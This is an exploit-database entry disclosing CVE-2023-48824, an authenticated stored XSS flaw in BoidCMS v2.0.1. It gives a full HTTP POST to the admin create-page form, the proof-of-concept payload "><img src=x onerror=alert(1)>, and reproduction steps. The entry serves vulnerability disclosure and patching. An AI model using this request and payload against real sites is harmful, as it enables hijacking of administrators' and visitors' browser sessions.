Share
## https://sploitus.com/exploit?id=PACKETSTORM:176031
# Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS
# Date: 13/11/2023
# Exploit Author: BugsBD Limited
# Discover by: Rahad Chowdhury
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip
# Version: v2.0.1
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48824
Descriptions:
BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting
(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,
keywords" parameters of settings, create page.
Steps to Reproduce:
1. Request:
POST /BoidCMS/admin?page=create HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------9882691211259772119227456445
Content-Length: 1492
Origin: http://192.168.1.74
Connection: close
Referer: http://192.168.1.74/BoidCMS/admin?page=create
Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc
Upgrade-Insecure-Requests: 1
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="type"
post
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="title"
test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="descr"
test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="keywords"
test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="content"
test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="permalink"
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="tpl"
theme.php
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="thumb"
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="date"
2023-12-02T19:41
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="pub"
true
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="token"
83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="create"
Create
-----------------------------9882691211259772119227456445--
2. Now use xss payload "><img src=x onerror=alert(1)> on "title,
subtitle, footer, keywords" parameters.
3. Save and check home.
## Reproduce:
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)